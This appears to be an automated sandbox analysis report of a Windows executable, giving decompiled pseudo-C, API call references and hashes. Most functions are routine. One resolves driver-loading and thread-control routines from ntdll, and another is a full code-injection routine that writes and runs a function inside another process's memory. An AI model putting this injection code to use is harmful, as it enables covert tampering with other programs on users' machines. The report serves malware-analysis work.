                                                                                                  					_t13 =  *__edi;
                                                                                                  					do {
                                                                                                  						_t1 =  &_a8; // 0x4057e1
                                                                                                  						 *__eax =  *__eax +  *_t1;
                                                                                                  						_t16 =  *__eax;
                                                                                                  					} while (__edx >= _t16);
                                                                                                  					_t8 = malloc(_t16 * _a4); // executed
                                                                                                  					 *__edi = _t8;
                                                                                                  					if(_t22 > 0) {
                                                                                                  						if(_t8 != 0) {
                                                                                                  							memcpy(_t8, _t13, _t22 * _a4);
                                                                                                  						}
                                                                                                  						free(_t13); // executed
                                                                                                  					}
                                                                                                  					return 0 |  *_t21 != 0x00000000;
                                                                                                  				}
                                                                                                  			}








                                                                                                  0x00404951
                                                                                                  0x00404952
                                                                                                  0x00404956
                                                                                                  0x004049a1
                                                                                                  0x00404958
                                                                                                  0x00404959
                                                                                                  0x0040495b
                                                                                                  0x0040495b
                                                                                                  0x0040495f
                                                                                                  0x00404961
                                                                                                  0x00404963
                                                                                                  0x0040496d
                                                                                                  0x00404975
                                                                                                  0x00404977
                                                                                                  0x0040497b
                                                                                                  0x00404985
                                                                                                  0x0040498a
                                                                                                  0x0040498e
                                                                                                  0x00404993
                                                                                                  0x0040499d
                                                                                                  0x0040499d

                                                                                                  APIs
                                                                                                  • malloc.MSVCRT ref: 0040496D
                                                                                                  • memcpy.MSVCRT ref: 00404985
                                                                                                  • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: freemallocmemcpy
                                                                                                  • String ID: W@
                                                                                                  • API String ID: 3056473165-1729568415
                                                                                                  • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                  • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                  • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                  • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405436(wchar_t* _a4) {
                                                                                                  				void _v2050;
                                                                                                  				signed short _v2052;
                                                                                                  				void* __esi;
                                                                                                  				struct HINSTANCE__* _t16;
                                                                                                  				WCHAR* _t18;
                                                                                                  
                                                                                                  				_v2052 = _v2052 & 0x00000000;
                                                                                                  				memset( &_v2050, 0, 0x7fe);
                                                                                                  				E00404C3C( &_v2052);
                                                                                                  				_t18 =  &_v2052;
                                                                                                  				E004047AF(_t18);
                                                                                                  				wcscat(_t18, _a4);
                                                                                                  				_t16 = LoadLibraryW(_t18); // executed
                                                                                                  				if(_t16 == 0) {
                                                                                                  					return LoadLibraryW(_a4);
                                                                                                  				}
                                                                                                  				return _t16;
                                                                                                  			}








                                                                                                  0x0040543f
                                                                                                  0x00405456
                                                                                                  0x00405462
                                                                                                  0x00405467
                                                                                                  0x0040546d
                                                                                                  0x00405478
                                                                                                  0x00405489
                                                                                                  0x0040548d
                                                                                                  0x00000000
                                                                                                  0x00405492
                                                                                                  0x00405496

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                    • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                    • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                  • wcscat.MSVCRT ref: 00405478
                                                                                                  • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3725422290-0
                                                                                                  • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                  • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                  • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                  • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                    • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                    • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                    • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 4232544981-0
                                                                                                  • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                  • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                  • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                  • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                  				signed int _v8;
                                                                                                  				void* _t8;
                                                                                                  				void* _t13;
                                                                                                  
                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                  				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                                                  				_t13 = _t8;
                                                                                                  				if(_v8 != 0) {
                                                                                                  					FreeLibrary(_v8);
                                                                                                  				}
                                                                                                  				return _t13;
                                                                                                  			}






                                                                                                  0x00408f4c
                                                                                                  0x00408f57
                                                                                                  0x00408f60
                                                                                                  0x00408f62
                                                                                                  0x00408f67
                                                                                                  0x00408f67
                                                                                                  0x00408f71

                                                                                                  APIs
                                                                                                    • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                    • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 187924719-0
                                                                                                  • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                  • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                  • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                  • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr* _t6;
                                                                                                  				void* _t8;
                                                                                                  				struct HINSTANCE__** _t10;
                                                                                                  
                                                                                                  				_t10 = __eax;
                                                                                                  				E00409921(__eax);
                                                                                                  				_t6 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                                  				if(_t6 == 0) {
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                                  				return _t8;
                                                                                                  			}







                                                                                                  0x004098fa
                                                                                                  0x004098fc
                                                                                                  0x00409901
                                                                                                  0x00409907
                                                                                                  0x00000000
                                                                                                  0x0040991c
                                                                                                  0x00409918
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                  • String ID:
                                                                                                  • API String ID: 3859505661-0
                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                  • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                  • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004095DA(signed int* __edi) {
                                                                                                  				void* __esi;
                                                                                                  				struct HINSTANCE__* _t3;
                                                                                                  				signed int* _t7;
                                                                                                  
                                                                                                  				_t7 = __edi;
                                                                                                  				_t3 =  *__edi;
                                                                                                  				if(_t3 != 0) {
                                                                                                  					FreeLibrary(_t3); // executed
                                                                                                  					 *__edi =  *__edi & 0x00000000;
                                                                                                  				}
                                                                                                  				E004099D4( &(_t7[0xa]));
                                                                                                  				return E004099D4( &(_t7[6]));
                                                                                                  			}






                                                                                                  0x004095da
                                                                                                  0x004095da
                                                                                                  0x004095de
                                                                                                  0x004095e1
                                                                                                  0x004095e7
                                                                                                  0x004095e7
                                                                                                  0x004095ee
                                                                                                  0x004095fc

                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 3664257935-0
                                                                                                  • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                  • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                  • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                  • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                  
                                                                                                  				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                                                  				return 1;
                                                                                                  			}



                                                                                                  0x0040a3d0
                                                                                                  0x0040a3d9

                                                                                                  APIs
                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: EnumNamesResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3334572018-0
                                                                                                  • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                  • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                  • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                  • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00408E31() {
                                                                                                  				void* _t1;
                                                                                                  				struct HINSTANCE__* _t2;
                                                                                                  				_Unknown_base(*)()* _t14;
                                                                                                  
                                                                                                  				if( *0x41c4ac == 0) {
                                                                                                  					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                                  					 *0x41c4ac = _t2;
                                                                                                  					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                                  					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
                                                                                                  					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
                                                                                                  					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
                                                                                                  					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
                                                                                                  					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
                                                                                                  					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
                                                                                                  					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
                                                                                                  					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
                                                                                                  					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
                                                                                                  					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
                                                                                                  					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
                                                                                                  					 *0x41c4a8 = _t14;
                                                                                                  					return _t14;
                                                                                                  				}
                                                                                                  				return _t1;
                                                                                                  			}






                                                                                                  0x00408e38
                                                                                                  0x00408e44
                                                                                                  0x00408e56
                                                                                                  0x00408e68
                                                                                                  0x00408e7a
                                                                                                  0x00408e8c
                                                                                                  0x00408e9e
                                                                                                  0x00408eb0
                                                                                                  0x00408ec2
                                                                                                  0x00408ed4
                                                                                                  0x00408ee6
                                                                                                  0x00408ef8
                                                                                                  0x00408f0a
                                                                                                  0x00408f1c
                                                                                                  0x00408f21
                                                                                                  0x00408f23
                                                                                                  0x00000000
                                                                                                  0x00408f28
                                                                                                  0x00408f29

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                  • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                  • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                  • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                  • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                  • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                  • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                  • API String ID: 667068680-4280973841
                                                                                                  • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                  • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                  • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                  • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 70%
                                                                                                  			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
                                                                                                  				char _v8;
                                                                                                  				long _v12;
                                                                                                  				long _v16;
                                                                                                  				long _v20;
                                                                                                  				intOrPtr _v24;
                                                                                                  				long _v28;
                                                                                                  				char _v564;
                                                                                                  				char _v16950;
                                                                                                  				char _v33336;
                                                                                                  				_Unknown_base(*)()* _v33348;
                                                                                                  				_Unknown_base(*)()* _v33352;
                                                                                                  				void _v33420;
                                                                                                  				void _v33432;
                                                                                                  				void _v33436;
                                                                                                  				intOrPtr _v66756;
                                                                                                  				intOrPtr _v66760;
                                                                                                  				void _v66848;
                                                                                                  				void _v66852;
                                                                                                  				void* __edi;
                                                                                                  				void* _t76;
                                                                                                  				_Unknown_base(*)()* _t84;
                                                                                                  				_Unknown_base(*)()* _t87;
                                                                                                  				void* _t90;
                                                                                                  				signed int _t126;
                                                                                                  				struct HINSTANCE__* _t128;
                                                                                                  				intOrPtr* _t138;
                                                                                                  				void* _t140;
                                                                                                  				void* _t144;
                                                                                                  				void* _t147;
                                                                                                  				void* _t148;
                                                                                                  
                                                                                                  				E0040B550(0x10524, __ecx);
                                                                                                  				_t138 = _a4;
                                                                                                  				_v12 = 0;
                                                                                                  				 *_t138 = 0;
                                                                                                  				_t76 = OpenProcess(0x1f0fff, 0, _a8);
                                                                                                  				_a8 = _t76;
                                                                                                  				if(_t76 == 0) {
                                                                                                  					 *_t138 = GetLastError();
                                                                                                  					L30:
                                                                                                  					return _v12;
                                                                                                  				}
                                                                                                  				_v33436 = 0;
                                                                                                  				memset( &_v33432, 0, 0x8284);
                                                                                                  				_t148 = _t147 + 0xc;
                                                                                                  				_t128 = GetModuleHandleW(L"kernel32.dll");
                                                                                                  				_v8 = 0;
                                                                                                  				E00409C70( &_v8);
                                                                                                  				_push("CreateProcessW");
                                                                                                  				_push(_t128);
                                                                                                  				if(_v8 == 0) {
                                                                                                  					_t84 = GetProcAddress();
                                                                                                  				} else {
                                                                                                  					_t84 = _v8();
                                                                                                  				}
                                                                                                  				_v33352 = _t84;
                                                                                                  				E00409C70( &_v8);
                                                                                                  				_push("GetLastError");
                                                                                                  				_push(_t128);
                                                                                                  				if(_v8 == 0) {
                                                                                                  					_t87 = GetProcAddress();
                                                                                                  				} else {
                                                                                                  					_t87 = _v8();
                                                                                                  				}
                                                                                                  				_t140 = _a28;
                                                                                                  				_v33348 = _t87;
                                                                                                  				if(_t140 != 0) {
                                                                                                  					_t126 = 0x11;
                                                                                                  					memcpy( &_v33420, _t140, _t126 << 2);
                                                                                                  					_t148 = _t148 + 0xc;
                                                                                                  				}
                                                                                                  				_v33420 = 0x44;
                                                                                                  				if(_a16 == 0) {
                                                                                                  					_v33336 = 1;
                                                                                                  				} else {
                                                                                                  					E00404923(0x2000,  &_v33336, _a16);
                                                                                                  				}
                                                                                                  				if(_a12 == 0) {
                                                                                                  					_v16950 = 1;
                                                                                                  				} else {
                                                                                                  					E00404923(0x2000,  &_v16950, _a12);
                                                                                                  				}
                                                                                                  				if(_a24 == 0) {
                                                                                                  					_v564 = 1;
                                                                                                  				} else {
                                                                                                  					E00404923(0x104,  &_v564, _a24);
                                                                                                  				}
                                                                                                  				_v24 = _a20;
                                                                                                  				_v28 = 0;
                                                                                                  				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
                                                                                                  				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
                                                                                                  				_a12 = _t90;
                                                                                                  				if(_a16 == 0 || _t90 == 0) {
                                                                                                  					 *_a4 = GetLastError();
                                                                                                  				} else {
                                                                                                  					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
                                                                                                  					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
                                                                                                  					_v20 = 0;
                                                                                                  					_v16 = 0;
                                                                                                  					_a24 = 0;
                                                                                                  					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
                                                                                                  					_a28 = _t144;
                                                                                                  					if(_t144 == 0) {
                                                                                                  						 *_a4 = GetLastError();
                                                                                                  					} else {
                                                                                                  						ResumeThread(_t144);
                                                                                                  						WaitForSingleObject(_t144, 0x7d0);
                                                                                                  						CloseHandle(_t144);
                                                                                                  					}
                                                                                                  					_v66852 = 0;
                                                                                                  					memset( &_v66848, 0, 0x8284);
                                                                                                  					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
                                                                                                  					VirtualFreeEx(_a8, _a16, 0, 0x8000);
                                                                                                  					VirtualFreeEx(_a8, _a12, 0, 0x8000);
                                                                                                  					if(_a28 != 0) {
                                                                                                  						 *_a4 = _v66756;
                                                                                                  						_v12 = _v66760;
                                                                                                  						if(_a32 != 0) {
                                                                                                  							asm("movsd");
                                                                                                  							asm("movsd");
                                                                                                  							asm("movsd");
                                                                                                  							asm("movsd");
                                                                                                  						}
                                                                                                  					}
                                                                                                  					if(_v20 != 0) {
                                                                                                  						FreeLibrary(_v20);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				goto L30;
                                                                                                  			}

































                                                                                                  0x0040a474
                                                                                                  0x0040a47b
                                                                                                  0x0040a48a
                                                                                                  0x0040a48d
                                                                                                  0x0040a48f
                                                                                                  0x0040a497
                                                                                                  0x0040a49a
                                                                                                  0x0040a6f7
                                                                                                  0x0040a6f9
                                                                                                  0x0040a700
                                                                                                  0x0040a700
                                                                                                  0x0040a4ad
                                                                                                  0x0040a4b3
                                                                                                  0x0040a4b8
                                                                                                  0x0040a4c6
                                                                                                  0x0040a4cc
                                                                                                  0x0040a4cf
                                                                                                  0x0040a4dd
                                                                                                  0x0040a4e2
                                                                                                  0x0040a4e3
                                                                                                  0x0040a4ea
                                                                                                  0x0040a4e5
                                                                                                  0x0040a4e5
                                                                                                  0x0040a4e5
                                                                                                  0x0040a4ec
                                                                                                  0x0040a4f6
                                                                                                  0x0040a4fe
                                                                                                  0x0040a503
                                                                                                  0x0040a504
                                                                                                  0x0040a50b
                                                                                                  0x0040a506
                                                                                                  0x0040a506
                                                                                                  0x0040a506
                                                                                                  0x0040a50d
                                                                                                  0x0040a512
                                                                                                  0x0040a518
                                                                                                  0x0040a51c
                                                                                                  0x0040a523
                                                                                                  0x0040a523
                                                                                                  0x0040a523
                                                                                                  0x0040a528
                                                                                                  0x0040a537
                                                                                                  0x0040a54c
                                                                                                  0x0040a539
                                                                                                  0x0040a544
                                                                                                  0x0040a549
                                                                                                  0x0040a558
                                                                                                  0x0040a56d
                                                                                                  0x0040a55a
                                                                                                  0x0040a565
                                                                                                  0x0040a56a
                                                                                                  0x0040a579
                                                                                                  0x0040a591
                                                                                                  0x0040a57b
                                                                                                  0x0040a589
                                                                                                  0x0040a58e
                                                                                                  0x0040a5b4
                                                                                                  0x0040a5b7
                                                                                                  0x0040a5cc
                                                                                                  0x0040a5cf
                                                                                                  0x0040a5d4
                                                                                                  0x0040a5d7
                                                                                                  0x0040a6ed
                                                                                                  0x0040a5e5
                                                                                                  0x0040a5fa
                                                                                                  0x0040a60b
                                                                                                  0x0040a61a
                                                                                                  0x0040a620
                                                                                                  0x0040a623
                                                                                                  0x0040a62b
                                                                                                  0x0040a62f
                                                                                                  0x0040a632
                                                                                                  0x0040a659
                                                                                                  0x0040a634
                                                                                                  0x0040a635
                                                                                                  0x0040a641
                                                                                                  0x0040a648
                                                                                                  0x0040a648
                                                                                                  0x0040a668
                                                                                                  0x0040a66e
                                                                                                  0x0040a685
                                                                                                  0x0040a69e
                                                                                                  0x0040a6a8
                                                                                                  0x0040a6ad
                                                                                                  0x0040a6bd
                                                                                                  0x0040a6c5
                                                                                                  0x0040a6c8
                                                                                                  0x0040a6d0
                                                                                                  0x0040a6d1
                                                                                                  0x0040a6d2
                                                                                                  0x0040a6d3
                                                                                                  0x0040a6d3
                                                                                                  0x0040a6c8
                                                                                                  0x0040a6d7
                                                                                                  0x0040a6dc
                                                                                                  0x0040a6dc
                                                                                                  0x0040a6d7
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                  • memset.MSVCRT ref: 0040A4B3
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
